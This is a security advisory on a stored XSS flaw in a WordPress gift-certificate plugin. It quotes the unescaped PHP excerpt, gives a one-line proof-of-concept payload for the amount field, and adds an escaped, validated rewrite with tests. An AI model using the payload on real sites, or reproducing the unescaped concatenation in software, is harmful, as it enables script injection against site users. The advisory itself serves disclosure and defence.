WordPress plugin Printable Gift Certificate Plugin - XSS

The code in wpgft_processOrder.php does not sanitize user input, which leads to a stored XSS vulnerability.

Posted by @elber333 - 17/10/2017 - FireShell Security team
fireshellsecurity.team - MAIL: admin@fireshellsecurity.team

Description:

Gift Certificate Creator WordPress plugin allows you to manage gift certificates on your website. In a convenient front-end UI provided by this plugin, your site visitors can enter the amount and user details. On form submission, the user details will be sent to the administrator. Also, the administrator can view the list of all the certificate requests.

Download: https://wordpress.org/plugins/gift-certificate-creator/

Vulnerability:

    The page can be published via the shortcode [wpgft id=0 button_only="TRUE"], which lets a visitor submit and add a gift certificate to the database. This action is handled by the wpgft_processOrder.php script, which does not escape the inputs before displaying them, allowing an attacker to inject a malicious script into the site.

    Code:

    Excerpt of code contained in wpgft_processOrder.php

    
    // Vulnerable excerpt: $amount and $error_amount are built from user input and are
    // concatenated into HTML without escaping; only button_id passes through esc_attr().
    if( $error_amount ) {
        $post_content .= '<dd>'. $currencySymbol . '<input type="text" name="amount" value="'. $amount .' " /> 
    <input type="hidden" name="button_id" value="'. esc_attr($_POST['button_id']).'" />
    <br /><span class="wpgft_error">'. $error_amount.'></span></dd>'; 

    } else {
    // Same problem on the non-error path: $amount lands both in the element body and in an attribute.
    $post_content .= '<dd>'.$currencySymbol.$amount.'<input type="hidden" name="amount" value="'.$amount.'" />
    <input type="hidden" name="button_id" value="'.esc_attr($_POST['button_id']).'" /></dd>';
    }

    XSS:

    
    Select the 'amount' input and submit the following script:
    
    "><BODY ONLOAD=alert('XSS')><"
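
    Mitigation:

    The following is an added example, not code from the plugin or from the advisory author: it rebuilds the same <dd> fragment as the excerpt above but escapes every dynamic value with the WordPress helpers esc_attr() (for attribute values) and esc_html() (for element text), and additionally rejects a non-numeric amount before any HTML is built. The function name wpgft_amount_fragment_safe, the wpgft_validate_amount helper, and the sample values are assumptions made for the example; the stand-in definitions of esc_attr()/esc_html() exist only so the file runs outside WordPress from the CLI.

```php
<?php
// Added example (not the plugin's code). Inside WordPress the real esc_attr()
// and esc_html() are used; outside WordPress these stand-ins (assumption) let
// the file run from the command line.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}

/**
 * Input validation (hypothetical helper): an amount is a positive number, so
 * anything else is refused up front instead of being echoed back into the page.
 * Returns the normalised amount as a string, or null when the input is invalid.
 */
function wpgft_validate_amount( $raw ) {
    $raw = trim( (string) $raw );
    if ( ! preg_match( '/^\d+(\.\d{1,2})?$/', $raw ) ) {
        return null;
    }
    return $raw;
}

/**
 * Build the <dd> fragment the way the plugin does, but with output escaping on
 * every user-controlled value. $raw_amount and $button_id are request values;
 * $error_amount is the message shown when validation failed.
 */
function wpgft_amount_fragment_safe( $raw_amount, $currencySymbol, $button_id ) {
    $amount       = wpgft_validate_amount( $raw_amount );
    $error_amount = ( $amount === null ) ? 'Please enter a valid amount.' : '';
    $post_content = '';

    if ( $error_amount ) {
        // Re-display the raw value so the visitor can correct it, but only
        // through esc_attr(): a quote or angle bracket can no longer close
        // the value="" attribute.
        $post_content .= '<dd>' . esc_html( $currencySymbol )
            . '<input type="text" name="amount" value="' . esc_attr( $raw_amount ) . '" />'
            . '<input type="hidden" name="button_id" value="' . esc_attr( $button_id ) . '" />'
            . '<br /><span class="wpgft_error">' . esc_html( $error_amount ) . '</span></dd>';
    } else {
        // Element text and attribute value each get the escaper for their context.
        $post_content .= '<dd>' . esc_html( $currencySymbol ) . esc_html( $amount )
            . '<input type="hidden" name="amount" value="' . esc_attr( $amount ) . '" />'
            . '<input type="hidden" name="button_id" value="' . esc_attr( $button_id ) . '" /></dd>';
    }
    return $post_content;
}

// Constructed inputs: the payload from the advisory and a legitimate amount.
$payload = '"><BODY ONLOAD=alert(\'XSS\')><"';
$html    = wpgft_amount_fragment_safe( $payload, '$', '7' );

// The injected markup must survive only as escaped text, never as a tag.
assert( strpos( $html, '<BODY' ) === false );
assert( strpos( $html, 'wpgft_error' ) !== false );
echo $html, PHP_EOL;

$html_ok = wpgft_amount_fragment_safe( '25.00', '$', '7' );
assert( strpos( $html_ok, 'wpgft_error' ) === false );
echo $html_ok, PHP_EOL;
```

    Escaping is applied at output time, in the context the value lands in (attribute versus element text), which is what the original excerpt misses for $amount and $error_amount even though it already does so for button_id. Validation of the amount is a second, independent control: it does not replace escaping, but it removes any reason for arbitrary strings to be stored or reflected in the first place.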